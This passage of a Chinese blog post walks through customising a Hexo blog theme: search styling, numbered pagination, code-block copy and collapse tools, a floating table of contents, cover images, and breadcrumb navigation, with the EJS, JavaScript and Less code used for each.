    </div>

    search.css

    search.css 设计一下布局:

    .page-header{
    display: flex;
    align-items: center; /* 在垂直方向上居中对齐子元素 */
    }
    .local-search {
    position: relative;
    text-align: left;
    display: grid;
    }
    .local-search-input-box {
    display: flex;
    height: 24px;
    margin: 20px 10px 0 10px;
    padding: 4px 12px;
    border-radius: 20px;
    border: 2px solid #898fa0;
    color: #666;
    font-size: 14px;
    align-items: center; /* 在垂直方向上居中对齐子元素 */
    }
    .local-search-input-cls {
    width: 100%;
    /* margin: 10px 0; */
    color: #12183A;
    font-size: 16px;
    padding-left: 0.6em;
    border: none;
    outline:none;
    }
    a.search-result-title {
    display: flow !important;
    width: auto !important;
    height: auto !important;
    margin-left: 0 !important;
    }
    .local-search-result-cls {
    overflow-y: overlay;
    max-height: calc(80vh - 200px);
    width: 100%;
    margin: 20px 0;
    }
    @media screen and (max-width: 800px) {
    .local-search-result-cls {
    margin: 20px 10px;
    }
    }
    .local-search-empty {
    color: #888;
    line-height: 44px;
    text-align: center;
    display: block;
    font-size: 18px;
    font-weight: 400;
    }
    .local-search-result-cls ul {
    min-width: 400px;
    max-width: 900px;
    max-height: 600px;
    min-height: 0;
    height: auto;
    margin: 15px 5px 15px 20px;
    padding-right: 30px;
    }
    @media screen and (max-width: 800px) {
    .local-search-result-cls ul {
    min-width: auto;
    max-width: max-content;
    max-height: 70vh;
    min-height: auto;
    padding: 0 10px 10px 10px 10px;
    }
    }
    .local-search-result-cls ul li {
    text-align: left;
    border-bottom: 1px solid #bdb7b7;
    padding-bottom: 10px;
    margin-bottom: 20px;
    line-height: 30px;
    font-weight: 400;
    }
    .local-search-result-cls ul li:last-child {
    border-bottom: none;
    margin-bottom: 0;
    }
    .local-search-result-cls ul li a {
    margin-top: 20px;
    font-size: 18px;
    text-decoration: none;
    transition: all .3s;
    font-weight: bold;
    color: #12183A;
    }
    .local-search-result-cls ul li a:hover {
    text-decoration:underline;
    }
    .local-search-result-cls ul li p {
    margin-top: 10px;
    font-size: 14px;
    max-height: 124px;
    overflow: hidden;
    }
    .local-search-result-cls ul li em.search-keyword {
    color: #00F;
    font-weight:bold;
    font-style: normal;
    }

    .search_icon{
    width: 14px;
    height: 14px;
    }
    .search-dialog {
    display: block;
    padding: 64px 80px 20px 80px;
    width: 100%;
    align-items: center; /* 在垂直方向上居中对齐子元素 */
    margin: 0 0 20px;
    }
    @media screen and (max-width: 800px) {
    .search-dialog {
    box-sizing: border-box;
    top: 0;
    left: 0;
    margin: 0;
    width: 100%;
    height: 100%;
    border-radius: 0;
    padding: 50px 15px 20px 15px;
    }
    }
    .local-search-match-count{
    padding: 20px 20px 0 20px;
    color: #12183A;
    }
    .search-dialog h2{
    display: inline-block;
    width: 100%;
    margin-bottom: 20px;
    color: #424242;
    font-size: 1.7rem;
    }
    .search-close-button:hover {
    filter: brightness(120%);
    }
    #local-search .search-dialog .local-search-box {
    margin: 0 auto;
    max-width: 100%;
    width: 100%;
    }
    .custom-hr, .search-dialog hr {
    position: relative;
    margin: 0 auto;
    border: 1px dashed #bdb7b7;
    width: calc(100% - 4px);
    }
    input[type="search"]::-webkit-search-cancel-button {
    -webkit-appearance: none;
    height: 10px;
    width: 10px;
    background: url(/images/close.png) no-repeat;
    background-size: contain;
    }
    input[type="search"]::-webkit-search-cancel-button:hover {
    filter: brightness(120%);
    }

    部署

    index.less 导入 css:

    @import "./plugin/search.css";

    ​ 我把这个搜索模块放到了统计页面下 grouping 前,看起来还不错,然后设置一个开关控制这个功能是否启用。

    <% if(theme.search && is_archive()) { %>
    <%- partial('_widget/search') %>
    <% } %>

    演示

    ​ 本地是秒出结果的,部署上去的话会比较卡,乱输的话还会崩溃 emmm 手机试了下没加载成功……果然还是 bb 太多了。

    png

    翻页功能改进

    ​ 这个主题只能提供上一页和下一页两个翻页功能,一页一页地翻效率太低了,不适合这个目前 bb 了 28 页的的博客,修改一下。

    方法论

    ​ hexo 渲染博客会根据文章数量进行分页。查一下 API:变量 | Hexo

    变量描述类型
    page.per_page每页显示的文章数量number
    page.total总页数number
    page.current目前页数number
    page.current_url目前分页的网址string
    page.posts本页文章 (Data Model)object
    page.prev上一页的页数。如果此页是第一页的话则为 0number
    page.prev_link上一页的网址。如果此页是第一页的话则为 ''string
    page.next下一页的页数。如果此页是最后一页的话则为 0number
    page.next_link下一页的网址。如果此页是最后一页的话则为 ''string
    page.path当前页面的路径(不含根目录)。我们通常在主题中使用 url_for(page.path)string

    ​ 对于首页(index),有 page.prev_linkpage.next_link 两个变量可以使用,所以实现上一页和下一页的功能是比较容易的。

    ​ 但要是想翻到其它页,得使用其它变量了。

    ​ 观察网站的网址。除了第 1 页的网址是 /,其他都是 /page/X

    ​ 所以根据 page.currentpage.total 足以写出翻页逻辑了,设置一个变量 pagination 控制左右显示的页数。

    代码

    home.ejs

    ​ 修改 home.ejs

    <div class="change-page">
    <div class="change-page">
    <% if(page.prev !==0 && theme.pagination !== 1){ // 前一页 %>
    <div class="page">
    <a href="<%- url_for(page.prev_link) %>">
    <div class="box">
    &#60;
    </div>
    </a>
    </div>
    <% } %>
    <% if (page.current > theme.pagination + 1) { %>
    <div class="page">
    <a href="<%- url_for('/') %>">
    <div class="box">1
    </div>
    </a>
    </div>
    <div class="page">
    <div class="ellipsis">
    <div class="box">...</div>
    </div>
    </div>
    <% } %>
    <% for(var i = page.current - theme.pagination; i <= page.current + theme.pagination; i++){ %>
    <% if(i >= 1 && i <= page.total){ %>
    <% if(i === page.current){ %>
    <div class="page">
    <div class="box">
    <%= i %>
    </div>
    </div>
    <% } else { %>
    <div class="page">
    <a href="<%- i=== 1 ? '/' : url_for('/page/' + i + '/') %>">
    <div class="box">
    <%= i %>
    </div>
    </a>
    </div>
    <% } %>
    <% } %>
    <% } %>
    <% if (page.total - page.current > theme.pagination) { %>
    <div class="page">
    <div class="ellipsis">
    <div class="box">...</div>
    </div>
    </div>
    <div class="page">
    <a href="<%- page.total === 1 ? '/' : url_for('/page/' + page.total + '/') %> %>">
    <div class="box">
    <%= page.total %>
    </div>
    </a>
    </div>
    <% } %>
    <% if(page.next !==0 && theme.pagination !== 1){ %>
    <div class="page">
    <a href="<%- url_for(page.next_link) %>">
    <div class="box">
    &#62;
    </div>
    </a>
    </div>
    <% } %>
    </div>
    </div>

    home.less

    ​ 再调整 home.less

    .change-page {
    display: inline;
    color: #FFF;
    .box {
    background: #006AFF;
    width: 40px;
    height: 40px;
    line-height: 40px;
    border-radius: 10px;
    margin: 8px;
    box-shadow: 0 20px 40px 0 rgba(50,50,50,0.1);
    }
    .ellipsis
    {
    .box {
    background: #fff;
    color: #898FA0;
    }
    }
    .page {
    display: inline-block;
    a {
    color: @textColorTheme;
    text-decoration: none;
    .box {
    background: #fff;
    color: #898FA0;
    }
    .box:hover {
    margin-top: -15px;
    cursor: pointer;
    }
    }
    }
    }

    演示

    png

    ​ 现在翻页不仅可以翻到上一页和下一页,还可以翻到首页、尾页以及周围的页数。如果周围的页数与首页和尾页不连续,添加省略号。

    首页显示 description

    ​ 在主页文章的 description 以更好地展示这篇文章在大致在 bb 什么。

    ​ 这对加密的文档,post.excerpt 会一律显示“这里有东西被加密了,需要输入密码查看哦。”,大概是 hexo-blog-encryptpost.excerpt 给强行替换了,我想目前的解决的办法是换一个变量名称?所以按 Buteerfly 的样式将关键词改成了 description。

    代码

    home.ejs

    home.ejs 中找到 post-block-content-info,加上显示 post.description 的代码:

    <span class="post-block-content-info-description">
    <%= post.description %>
    </span>

    home.less

    home.less 修改样式:

    .post-card-description {
    padding: 10px 16px;
    text-align: right;
    flex-grow: 1;
    font-size: 14px;
    font-weight: 500;
    line-height: 36px;
    color: #999;
    }

    演示

    ​ 最终演示:

    png

    代码块辅助

    ​ 对于又臭又长的代码,设计复制代码按钮、显示代码语言和隐藏代码块三个实用功能。(借鉴自 Butterfly)

    方法论

    ​ 这个主题在渲染 markdown 的代码块语句时,会把它渲染成下图所示的形式:

    png

    代码

    highlight_tools.ejs

    highlight_tools.ejs<pre> 元素获取了,再把相关参数一并送给 highlight_tools.js

    感觉这么写代码有点不规范,先这样吧!

    <%- js('js/widget/highlight_tools.js') %>
    <script>
    var codeBlocks = document.querySelectorAll('pre');
    createHighlightTools(codeBlocks, "<%= theme.icon.copy %>", "<%= theme.icon.close_code_block %>", "<%= page.highlight_shrink %>", "<%= page.highlight_height_limit %>"); // 调用函数并传递参数
    </script>

    highlight_tools.js

    function createHighlightTools()
    function createHighlightTools(codeBlocks, copyIcon, closeCodeBlockIcon, highlightShrink, HighlightHeightLimit) {
    codeBlocks.forEach(function (codeBlock) {
    if (!codeBlock.querySelector('code'))
    return;
    var container = createContainer(codeBlock);
    createCopyButton(container, codeBlock, copyIcon);
    createCodeLangText(container, codeBlock);
    createCloseCodeBlockButton(container, codeBlock, closeCodeBlockIcon, highlightShrink);
    setHighlightHeightLimit(codeBlock, HighlightHeightLimit);
    });
    }

    ​ 先找找这个 <pre> 有没有 <code> 这个子元素,防止误判。

    • createContainer() 给代码块顶端包一层,用于放置 UI。

    ​ 然后依次实现三个功能:

    • createCopyButton():创建复制按钮
    • createCodeLangText():代码语言提示文本
    • createCloseCodeBlockButton():关闭代码块功能
    function createContainer()
    function createContainer(codeBlock) {
    // 创建包裹代码块和按钮的容器元素
    var container = document.createElement('div');
    container.className = 'hightlight-tools';
    // 将容器元素插入到代码块之前
    codeBlock.parentNode.insertBefore(container, codeBlock);
    return container;
    }

    ​ 这样,在代码块上方就会多一个 <div class="highlight_tools">

    png

    function createCopyButton()

    ​ 之前找的大都要我去引用一个叫 clipboard.js 的东西,结果下载下来引用报错,找了一个不需要插件的代码:

    function createCopyButton(container, codeBlock, icon) {
    var button = document.createElement('button');
    button.className = 'copy-button';
    button.type = 'button';
    button.title = 'copy-button';
    button.style.backgroundImage = 'url("' + icon + '")';
    // 将按钮添加到容器元素内
    container.appendChild(button);
    // 创建提示文字
    // 创建 <span> 元素
    var span = document.createElement('span');
    span.textContent = "已复制";
    // 添加类名
    span.className = 'copy-notice';
    // 将文字添加到容器元素内
    container.appendChild(span);

    button.addEventListener('click', function () {
    // 获取代码块的文本内容,包括换行符
    var code = codeBlock.innerText;
    // 创建一个临时的 textarea 元素,并将代码块的内容设置为其值
    var textarea = document.createElement('textarea');
    textarea.value = code;
    // 将 textarea 元素追加到 body 中
    document.body.appendChild(textarea);
    // 选中 textarea 中的文本
    textarea.select();
    // 执行复制操作
    document.execCommand('copy');
    // 移除临时的 textarea 元素
    document.body.removeChild(textarea);
    // 已复制
    span.style.opacity = 1;
    // 2 秒后将目标元素的透明度设置为 0
    setTimeout(function () {
    span.style.opacity = 0;
    }, 1000);
    });
    }

    ​ 原文中获取代码内容的代码为 var code = codeBlock.textContent; 这么做会舍弃换行符,应改为 var code = codeBlock.innerText;

    ​ 同时加上”已复制“的提示文本。

    function createCodeLangText()
    function createCodeLangText(container, codeBlock) {
    // 创建提示文字
    // 创建 <span> 元素
    var span = document.createElement('span');
    span.textContent = codeBlock.querySelector('.hljs').classList.value.replace('hljs ', '').toUpperCase(); // 代码语言
    if (span.textContent === 'EBNF')
    span.textContent = '';
    // 添加类名
    span.className = 'code-lang';
    // 将文字添加到容器元素内
    container.appendChild(span);
    }

    ​ 获取 hljs 类中另一个类的名称,即为代码语言。如果 markdown 中没有设置代码语言,会渲染成 ebnf 类,把它替换为空。

    function createCloseCodeBlockButton()
    function createCloseCodeBlockButton(container, codeBlock, icon, highlight_shrink)
    {
    var button = document.createElement('button');
    button.className = 'close-code-block-button';
    button.type = 'button';
    button.title = 'close-code-block-button';
    button.style.backgroundImage = 'url("' + icon + '")';
    // 将按钮添加到容器元素内
    container.appendChild(button);
    if(Boolean(highlight_shrink))
    {
    var hljs = codeBlock.querySelector('.hljs');
    button.style.transform = "rotate(-90deg)";
    hljs.classList.add("closed");
    }
    button.addEventListener('click', function () {
    var hljs = codeBlock.querySelector('.hljs');
    if (!hljs.classList.contains('closed')) {
    button.style.transform = "rotate(-90deg)";
    hljs.classList.add("closed");
    }else{
    button.style.transform = "rotate(0deg)";
    hljs.classList.remove("closed");
    }
    });
    }

    ​ 获取 hljs类,给它加一个 closed类,剩余的逻辑交给 css 吧。

    ​ 文章新增参数 highlight_shrink,如果为 true,默认代码块就是关闭的。

    function setHighlightHeightLimit()
    function setHighlightHeightLimit(codeBlock, HighlightHeightLimit)
    {
    // 限制代码块最大长度
    if (HighlightHeightLimit != "")
    {
    var hljs = codeBlock.querySelector('.hljs');
    hljs.style.maxHeight = HighlightHeightLimit;
    }
    }

    ​ 控制代码块最大长度。这个值由 page.highlight_height_limit 控制。

    highlight_tools.css

    .hightlight-tools {
    background: #e6ebf1;
    position: relative;
    height: 32px;

    .copy-notice {
    font-weight: 500;
    position: absolute;
    right: 30px;
    font-size: 14px;
    opacity: 0;
    transition: opacity 0.4s;
    color: #b3b3b3;
    -webkit-user-select: none; /* Safari */
    -moz-user-select: none; /* Firefox */
    -ms-user-select: none; /* IE 10+ */
    user-select: none;
    }

    .copy-button {
    position: absolute;
    width: 18px;
    height: 18px;
    right: 6px;
    border: none;
    background-color: rgba(0, 0, 0, 0);
    background-size: cover;
    top: 50%;
    transform: translateY(-50%);
    }

    .copy-button:hover
    {
    filter: brightness(120%);
    }

    .code-lang {
    font-weight: bold;
    position: absolute;
    left: 30px;
    font-size: 16px;
    color: #b3b3b3;
    }

    .close-code-block-button {
    position: absolute;
    width: 16px;
    height: 16px;
    bottom: 8px;
    left: 6px;
    border: none;
    background-color: rgba(0, 0, 0, 0);
    background-size: cover;
    transition: transform 0.4s;
    }
    }

    pre {
    .closed {
    height: 0;
    padding: 0 !important;
    overflow-y: hidden;
    }
    }

    右边栏及目录

    ​ 这个主题自带 toc 功能,用的是 hexo 自带的 toc 功能,但是啥布局也没写……就一直没用。

    ​ 之前的目录一直用的是 hexo-toc 插件,但是这只能放到文章的一个大片段里,不能随着阅读跟随,体验不太好。

    ​ 决定重新设计一个目录架构,放到文章右侧并实时跟随。

    ​ hexo-toc 插件跟 自带的 toc 冲突了,把它卸了。

    npm uninstall hexo-toc

    方法论

    ​ 参考默认的 toc:辅助函数(Helpers)| Hexo

    ​ 使用 <%- toc(page.content,{list_number:false}) %> 语句就会一阵输出目录的内容:

    png

    ​ 对于 hexo 自带的 toc 功能,它会给所有标题添加 ID,ID 内容为标题的内容,同时生成连接 #XXX,使其可以跳转到目标位置。

    ​ 对于放到网址会有歧义的字符,会用 - 替代(hexo-toc 直接删掉这个字符,我想这是这个插件跟默认的 toc 冲突的原因)。

    ​ 对于重名的标题,会在后面追加 -X 作为区分。

    但是这个自带的 toc 似乎有 bug,某些结构的目录并不会把所有的 <li> 都放在 <ol class="toc-child"></ol> 中,而且碰 hexo-blog-encrypt 就废了,所以我打算根据它默认生成的目录结构重写一份生成目录的逻辑。

    代码

    rightside.ejs

    ​ 暂时把主题原来的 goTop.ejs 取代了换成侧边栏:rightside.ejs

    • hidden 会让目录及其按钮隐藏起来,这是加密插件的存在而设计。
    • toc.js 控制着目录生成的逻辑。
    <%- js('js/goto_position.js') %>
    <style>
    .rightside-button-icon
    {
    width: 18px;
    height: 18px;
    -webkit-user-select: none; /* Chrome, Safari, Opera */
    -moz-user-select: none; /* Firefox */
    -ms-user-select: none; /* Internet Explorer/Edge */
    user-select: none; /* Non-prefixed version, supported by most modern browsers */
    }
    </style>

    <div style="z-index: 3; position: fixed; bottom: 10px; right: 20px; transition: all 0.5s ease-out;" id="rightside">
    <% if(page.toc) { %>
    <div class="post-toc hidden" id="post-toc">
    <span class="post-toc-title">导航</span>
    <ol class="toc"></ol>
    </div>
    <div class="rightside-button hidden" id="js-toc">
    <span>
    <img src="<%- theme.icon.toc %>" class="rightside-button-icon" alt="Icon">
    </span>
    </div>
    <%- js('js/toc.js');%>
    <script>
    initToc();
    </script>
    <% } %>
    <div class="rightside-button" id="js-go_top">
    <span>
    <img src="<%- theme.icon.go_top %>" class="rightside-button-icon" alt="Icon">
    </span>
    </div>
    <div class="rightside-button" id="js-go_bottom">
    <span>
    <img src="<%- theme.icon.go_bottom %>" class="rightside-button-icon" alt="Icon">
    </span>
    </div>
    </div>

    <script>
    $('#js-go_top')
    .gotoPosition( {
    speed: 300,
    target: 'top',
    } );
    $('#js-go_bottom')
    .gotoPosition( {
    speed: 300,
    target: 'bottom',
    } );
    </script>

    goto_position.js

    ​ 魔改原来的 goTop.js 使其可以也滚动到底部:

    (function ($) {
    jQuery.fn.gotoPosition = function (opt) {
    var ele = this;
    var win = $(window);
    var doc = $("html,body");
    var defaultOpt = {
    speed: 500,
    iconSpeed: 200,
    animationShow: {
    opacity: "1",
    },
    animationHide: {
    opacity: "0",
    },
    };
    var options = $.extend(defaultOpt, opt);

    ele.click(function () {
    var targetOffset = 0;
    if (opt && opt.target) {
    if (opt.target === "top") {
    targetOffset = 0; // 跳转至文档顶部
    } else if (opt.target === "bottom") {
    targetOffset = $(document).height() - win.height(); // 跳转至文档底部
    }
    }
    doc.animate(
    {
    scrollTop: targetOffset, // 将文档元素滚动到目标位置
    },
    options.speed
    );
    });
    };
    })(jQuery);

    toc.js

    function initToc()

    ​ 初始化目录,如果文章没有被加密(类名为 hbehbe-content 的元素)不存在,则移除目录的 hidden 类。

    ​ 模仿 Butterfly,借助 localStorage 判断默认状态下是否显示目录。

    function initToc() {
    // 检查是否存在具有类名为 'hbe' 和 'hbe-content' 的元素
    if ($('.hbe.hbe-content').length > 0) {
    // 如果存在该元素,则给 '.rightside-button' 和 '.post-toc' 添加 'hidden' 类
    $('.rightside-button, .post-toc').addClass('hidden');
    return;
    } else {
    // 找到类名为 .rightside-button 的元素,并移除 hidden 类
    $('.rightside-button').removeClass('hidden');
    // 找到类名为 .post-toc 的元素,并移除 hidden 类
    $('.post-toc').removeClass('hidden');
    }

    var value = localStorage.getItem('aside-status');
    if (value === null) { // 如果存储项不存在,则创建它
    localStorage.setItem('aside-status', "true");
    value = true;
    }
    if (value === "true") {
    $("#post-toc").addClass("show-toc");
    $("#content").addClass("show-toc");
    }
    createToc();
    }
    createToc()

    创建目录:

    • <ol class="toc-child"></ol> 里不断追加元素
    • 点击目录中的元素会平滑跳转到对应的位置。
    function createToc() {
    var toc = $('.toc');
    toc.empty();

    var headings = $('#content').find('h1, h2, h3, h4, h5, h6');
    var currentLevel = 1;
    var currentList = toc;

    for (var i = 0; i < headings.length; i++) {
    var heading = $(headings[i]);
    // ID 开头不能为数字,如果为了,加个下划线
    if (/^[0-9]/.test(heading.attr('id'))) {
    heading.attr('id', '_' + heading.attr('id'));
    }
    if (!heading.find('a').length) // 标题里没有<a>,可能是用户自己创建的标题,跳过
    continue;
    var level = parseInt(heading.prop('tagName').charAt(1));
    // 创建目录
    if (level > currentLevel) {
    for (var j = currentLevel + 1; j <= level; j++) {
    var newOl = $('<ol>').addClass('toc-child');
    var newLi = $('<li>').addClass('toc-item toc-level-level1-' + j);
    currentList.append(newLi);
    newLi.append(newOl);
    currentList = newOl;
    }
    } else if (level < currentLevel) {
    for (var j = level; j < currentLevel; j++) {
    currentList = currentList.parent().parent();
    }
    }
    var li = $('<li>').addClass('toc-item toc-level-level-' + level);
    // 获取 hrefValue
    var hrefValue = heading.html().match(/href="([^"]+)"/) ? heading.html().match(/href="([^"]+)"/)[1] : '';
    // ID 开头不能为数字,如果为了,加个下划线
    if (!isNaN(parseInt(hrefValue.charAt(1)))) {
    hrefValue = hrefValue.slice(0, 1) + "_" + hrefValue.slice(1);
    }
    // 获取 titleValue
    var titleValue = heading.html().match(/title="([^"]+)"/) ? heading.html().match(/title="([^"]+)"/)[1] : '';
    // 创建 <a>
    li.html('<a class="toc-link" href="' + hrefValue + '"><span class="toc-text">' + titleValue + '</span></a>');
    var a = li.find("a");
    // 重写点击目录时的跳转逻辑
    a.on("click", function (event) {
    event.preventDefault();
    var element = $($(this).attr("href"));
    var rect = element[0].getBoundingClientRect();
    var topOffset = rect.top + window.scrollY - 90; // 有顶端栏的存在,-90
    window.scrollTo({
    top: topOffset,
    behavior: "smooth"
    });
    });
    currentList.append(li);
    currentLevel = level;
    }
    }
    $(“#js-toc”).click()

    ​ 点击按钮,控制目录是否展示。

    $("#js-toc").click(function () {
    var postToc = $("#post-toc");
    var content = $("#content");
    if (!postToc.hasClass("show-toc")) {
    localStorage.setItem('aside-status', true);
    content.addClass("show-toc");
    postToc.addClass("show-toc");
    } else {
    content.removeClass("show-toc");
    postToc.removeClass("show-toc");
    localStorage.setItem('aside-status', false);
    }
    });

    ​ 用于控制目录是否显示,送它一个 show-toc 类,剩下的交给 less。

    function getTopHeadingId()

    ​ 获取当前网页最顶端标题的 id,抄着下面的代码,-110 是考虑到了主题顶端栏的存在:

    function getTopHeadingId() {
    const headings = document.querySelector('#content').querySelectorAll('h1, h2, h3, h4, h5, h6');
    let topHeadingId = null;
    let minDistanceFromTop = Infinity;
    for (const heading of headings) {
    const boundingRect = heading.getBoundingClientRect();
    const distanceFromTop = Math.abs(boundingRect.y - 90);
    if (distanceFromTop < minDistanceFromTop) {
    minDistanceFromTop = distanceFromTop;
    topHeadingId = heading.id;
    }
    }
    return topHeadingId;
    }
    document.addEventListener()

    ​ 目录会根据当前所在位置高亮标题,送它一个 active 类,剩下的交给 less。

    ​ 当当前标题不在显示范围时,再给它强行滚动到可见范围。

    document.addEventListener("scroll", function (event) {
    const tocLinks = document.querySelectorAll('a.toc-link');
    const topHeadingId = getTopHeadingId();
    tocLinks.forEach(link => {
    var href = decodeURIComponent(link.getAttribute('href')).replace(/^#/, '');;
    if (href == topHeadingId) {
    if (!link.classList.contains('active')) {
    link.classList.add("active");
    var toc = document.querySelector(".toc");
    var activeItem = toc.querySelector(".active");
    if (activeItem) {
    toc.scrollTo({
    top: activeItem.offsetTop - 100
    });
    }
    }
    } else {
    link.classList.remove("active");
    }
    });
    }, 3000);

    toc.less

    ​ 继续模仿 Butterfly 的布局,展示目录的时候,主页面会向左移动,同时写了移动端的适配。

    .post-toc {
    border-radius: 10px;
    background: rgba(255, 255, 255, 0.9);
    box-shadow: 0 0 40px 0 rgba(50, 50, 50, 0.08);
    padding: 10px 5px 10px 5px;
    border: 1px solid rgba(18, 24, 58, 0.06);

    .post-toc-title {
    margin-left: 15px;
    font-weight: bold;
    color: #424242;
    font-size: 18px;
    }

    .toc {
    margin: 12px 5px 5px 5px;
    display: block;
    overflow: auto;
    }
    .toc::-webkit-scrollbar {
    width: 5px;
    height: 5px;
    }

    .toc::-webkit-scrollbar-thumb {
    background-color: #AAA; /* 修改滚动条滑块的颜色 */
    border-radius: 10px;
    }


    a {
    text-decoration: none;
    }

    ol {
    display: inline;
    list-style-type: none;

    a.active.toc-link {
    .toc-text {
    color: #FFF;
    }
    }

    .toc-link {
    margin-right: 5px;
    padding-top: 5px;
    padding-bottom: 5px;
    display: block;
    }

    li {
    margin-left: 10px;
    background: none;

    .toc-text {
    padding: 0 5px;
    color: #898fa0;
    }

    .active {
    span{
    padding: 4px 10px;
    border-radius: 8px;
    background: rgba(0, 106, 255, 0.8);
    }
    }

    }

    span:hover {
    color: #4183c4;
    }
    }
    }

    @media screen and (min-width: 1100px) {
    .post-toc {
    z-index: 2;
    position: fixed;
    bottom: 200px;
    width: 260px;
    right: -250px;
    transition: right 0.5s ease-out;
    }

    .toc {
    max-height: 40vh;
    }

    .post-toc.show-toc {
    right: min(30px, 2vw);
    }

    .post-toc.show-toc.hidden{
    right: -250px;
    }

    .post-content.show-toc{
    max-width: min(960px, 80vw);
    transform: translateX(calc(-0.1 * min(960px, 80vw)));
    }
    }

    @media screen and (max-width: 1100px) {
    .post-toc {
    z-index: 2;
    position: fixed;
    bottom: -30vh;
    min-width: 40vw;
    max-width: calc(75vw - 10px);
    right: min(70px, calc(10vw + 30px));
    margin-left: 20px;
    transition: bottom 0.5s ease-out;
    }

    .toc {
    max-height: 16vh;
    }

    .post-toc.show-toc {
    bottom: 20px;
    }

    .post-toc.show-toc.hidden{
    right: -30vh;
    }
    }

    dispatch_event.js

    ​ 新版的 hexo-blog-encrypt 提供了解密后的回调函数,更新这个插件:

    npm update hexo-blog-encrypt

    After Decrypt Event

    Thanks to @f-dong, we now will trigger a event named hexo-blog-decrypt, so you can add a call back to listen to that event.

    // trigger event
    var event = new Event('hexo-blog-decrypt');
    window.dispatchEvent(event);

    ​ 在解密后重新初始化目录:

    // trigger event
    var event = new Event('hexo-blog-decrypt');
    window.dispatchEvent(event);

    // 定义回调函数
    function handleHexoBlogDecryptEvent() {
    console.log("文章解密成功!");
    initToc();
    }

    // 添加事件监听器
    window.addEventListener('hexo-blog-decrypt', handleHexoBlogDecryptEvent);

    演示

    ​ 电脑端:

    png

    ​ 移动端:

    png

    标题图超框

    ​ 这是自己突发奇想原创的一个功能,增加一个变量控制这个功能让其看上去没有那么屎山。

    代码

    home.ejs

    ​ 修改 home.ejs,增加 post.cover_style 变量允许文章头部的 yaml 控制标题图的 style:

    <div class="img-container">
    <img style="<%- post.cover_style || '' %>" src="<%= post.cover ? post.cover : theme.default_cover %>" alt="Cover">
    </div>

    home.less

    ​ 对应 less:

    .img-container {
    width: 100%;
    height: 200px;
    background: @headerBackgroundColor;
    position: relative;
    img {
    width: 100%;
    height: 100%;
    object-fit: cover;
    display: block;
    }
    }

    超框图制作

    ​ 用 PS 修一个超框图,就决定是你了,癫狂公爵西塔尔!疯子也要有教养。

    ​ 我一般的 cover 都是设成 800px * 450px 的,这个封面图设置为 800px * 738px,用 PS 保证“框”的高度为 450px,“框“的顶部距离画面顶部 150px。

    png

    cover_style

    ​ 文章自定义 cover_style

    cover_style: "height: 164%; position: absolute; top: 0; left: 0; transform: translateY(-20.3%);"

    ​ 覆盖之前的封面图样式:

    • height: 164%;:由 738 / 450 = 1.64 得到。
    • position: absolute; top: 0; left: 0; object-fit: contain; 超框的处理。
    • transform: translateY(-20.3%);" 向上移 20.3%,因为 150 / 738 ≈ 20.3%。

    演示

    ​ 帅呆了!

    png

    置顶图标

    ​ 对于含有 top 属性的文章,增加一个置顶图标。

    代码

    home.ejs

    <% if(post.top){ %>
    <img src="<%= theme.icon.stiky %>" class="stiky" alt="Icon">
    <% } %>

    home.less

    ​ 对应的:

    .stiky{
    width: 18px;
    height: 18px;
    margin: 8px 6px 0 0;
    }

    演示

    png

    加密图标

    ​ 首页展示这个文章是否被加密,防止白点一趟。

    代码

    home.ejs

    ​ 根据 post.password 的值是否为空判断这个文章是否被加密。

    <img src="<%- post.password ? theme.icon.locked : theme.icon.normal %>" class="meat-type" alt="Icon">

    演示

    png

    面包屑导航栏

    ​ 设计的嵌套页面太深了,设计一个面包屑导航栏防止迷路。

    header.ejs

    ​ 添加一个 <ul> 以放置导航栏。

    <div class="h-left">
    <a href="<%= theme.menus_link.home %>" class="logo">
    <img src="<%- theme.logo %>" alt="Quiet">
    </a>
    <ul class="breadcrumb" id="breadcrumb"></ul>
    </div>

    ​ 底部调用 js,并传参(从 yaml 传参给 JS 还蛮复杂的,要花点脑经):

    <%- js('js/breadcrumb.js') %>
    <script>
    var menus_title = [];
    <% Object.keys(theme.menus_title).forEach(function(menu) { %>
    menus_title.push({<%= menu %>: '<%= theme.menus_title[menu] %>'});
    <% }); %>
    <% if(page.categories){ %>
    <% page.categories.data.map((cat)=>{ %>
    categoriesBreadcrumb(document.getElementById('breadcrumb'), "<%- cat.name %>", "/categories/<%- cat.name %>");
    <% }) %>
    <% } else { %>
    customBreadcrumb(document.getElementById('breadcrumb'), menus_title);
    <% } %>
    </script>

    ​ 设计两种面包屑导航栏:

    • customBreadcrumb 简单地根据页面网址生成导航栏。
    • categoriesBreadcrumb 对于常规的推文,根据它的类别生成导航栏。

    function customBreadcrumb()

    function customBreadcrumb(breadcrumb, menus_title) {
    // 获取当前页面路径
    var path = window.location.pathname;
    var levels = path.split('/');
    levels.shift(); // 移除第一个空字符串元素
    levels.pop(); // 移除最后一个空字符串元素

    // 生成面包屑导航
    for (var i = 0; i < levels.length; i++) {
    var levelLink = '/';
    for (var j = 0; j <= i; j++) {
    levelLink += levels[j] + '/';
    }
    var levelName = decodeURIComponent(levels[i]);

    if (i === 0) {
    // 查找 menus_title 中与 levelName 相同的键,并获取对应的值
    var title_obj = menus_title.find(function(item) {
    return item[levelName] !== undefined;
    });
    var title_value = title_obj ? title_obj[levelName] : null;
    if (!title_value) {
    return; // 如果找不到对应的值,直接返回,不执行后续代码
    }
    }
    }

    // 如果代码执行到这里,说明所有的值都能找到,可以继续添加元素到面包屑导航栏
    for (var i = 0; i < levels.length; i++) {
    var levelLink = '/';
    for (var j = 0; j <= i; j++) {
    levelLink += levels[j] + '/';
    }
    var levelName = decodeURIComponent(levels[i]);
    var li = document.createElement('li');
    var a = document.createElement('a');
    {
    if (i === 0) {
    a.textContent = title_value;
    } else {
    a.textContent = levelName;
    }
    if(i == levels.length - 1) {
    a.classList.add("last");
    }
    a.href = levelLink;
    }
    li.appendChild(a);
    breadcrumb.appendChild(li);
    }
    }

    function categoriesBreadcrumb()

    function categoriesBreadcrumb(breadcrumb, categories, categoriesLink) {
    var li = document.createElement('li');
    var a = document.createElement('a');

    a.textContent = categories;
    a.href = categoriesLink;
    li.appendChild(a);
    breadcrumb.appendChild(li);

    li = document.createElement('li');
    a = document.createElement('a');

    a.textContent = "文章";
    a.href = window.location.href;
    a.classList.add("last");

    li.appendChild(a);
    breadcrumb.appendChild(li);
    }

    header.less

    ​ 在 hearer.less 的相应位置设置样式:

    .breadcrumb {
    margin-left: 5px;
    display: flex;
    list-style: none;
    padding: 0;
    a{
    color: #898fa0;
    text-decoration: none;
    }
    .last{
    color: #12183A;
    }
    .dot {
    display: inline-block;
    width: 5px;
    height: 5px;
    border-radius: 50%;
    background: #006AFF;
    position: relative;
